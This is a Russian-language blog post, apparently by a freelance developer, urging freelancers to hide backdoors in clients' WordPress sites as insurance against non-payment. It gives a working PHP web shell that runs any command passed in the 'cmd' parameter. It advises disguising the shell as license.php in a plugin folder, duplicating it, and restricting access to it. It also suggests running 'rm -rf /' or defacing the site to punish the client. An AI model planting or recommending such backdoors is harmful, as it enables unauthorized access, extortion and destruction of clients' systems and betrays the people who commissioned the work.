Оставляем бэкдор для страховки от "нехороших" заказчиков
@webwareВсем Салам. Сегодня хотел бы поговорить о фрилансе и как работать без потерь для себя. А именно мы будем защищаться от плохих заказчиков, которые захотят нас кинуть после выполненной работы. Вы скажете, ну чтобы не кидал, бери половину суммы наперед или все сразу. Такое условие, если и прокатит, то только у опытных фрилансеров, у которых множество положительных отзывов. А, если ты новичок и ты хочешь половину суммы, то очень мала вероятность, что на твой ковер леттер, даже среагируют. Поэтому, настоятельно рекомендую писать "оплата после".
Немного теории
У меня, чуть больше 2 лет назад, в среднем, на каждый мой 3 ковер леттер реагировали, и в течении недели я брался за 3, а то и более проектов в зависимости от сложности. Ну наверное вы поняли, сейчас мы говорим о разработке сайтов, веб сервисов, порталов и всего такого, в данном случае на PHP. Сам процесс получается таким: заказчик выбирает вас, вы обговаривается условия, выполняете проект, сдаете ее заказчику и тут самое интересное, если вы поняли, что заказчик вас кинул и чтобы не остаться лоханутым, нужно предпринять определенные меры.
Практика
Предположим вы делаете сайт на WordPress. В процессе выполнения мы и создаем наши мини бэкдорчики и запихиваем в непалевные уголки структуры вордпресса. Самый оптимальный вариант, как по мне, это замаскировать его под license.php в папку какого-нибудь плагина, и на всякий случай еще дублируем в пару других мест.
Сам бэкдор будет выглядит таким образом, код простенький, если ему что-то передается, он принимает и функция system выполняет и отображает.
PHP:
if ( isset( $_REQUEST['cmd'] ) ) {
echo '<h1>' . 'Будьте честными!' . '</h1>';
echo '<pre>';
$cmd = ( $_REQUEST['cmd'] );
system( $cmd );
echo '</pre>';
}
Все просто, но все это очень сильно нам может помочь. Так, давайте посмотрим, что мы можем делать с помощью нашего бэкдорчика. Я его разместил в папке плагина akismet. Попробуем посмотреть содержимое папки с помощью команды ls.
Все отлично получается, все также как и в нашем любимом терминале, можно тупо rm -rf / и сайту хана. Но не стоит сразу так категорически относится, лучше дать еще один шанс заказчику. Например, сделать дефейс главной страницы, с предупредительной надписью и заказчик точно не захочет, чтобы его сайт впоследствии не был снесен. И теперь будет знать, что кидать не есть хорошо. Можете предложить свои варианты в комментах, как еще можно покарать нечестного.
Еще, нам бы не захотелось, чтобы другие случайно могли получить доступ к нашему бэкдору. Чтобы этого избежать, мы можем реализовать, через .htaccess доступ к файлу по паролю или же дать доступ к файлу только нашему ip. Подробнее можете изучить тут.
В ином случае, если заказчик вам платит, как и договаривались, то удаляйте бэкдоры, тоже будьте честными. Лично у меня был только 1 случай, когда заказчик, хотел ускользнуть, но этот способ наказания мне помог и справедливость восторжествовала.
На этом думаю завершим. Если у вас были подобные моменты, поделитесь в комментах. Всем удачи!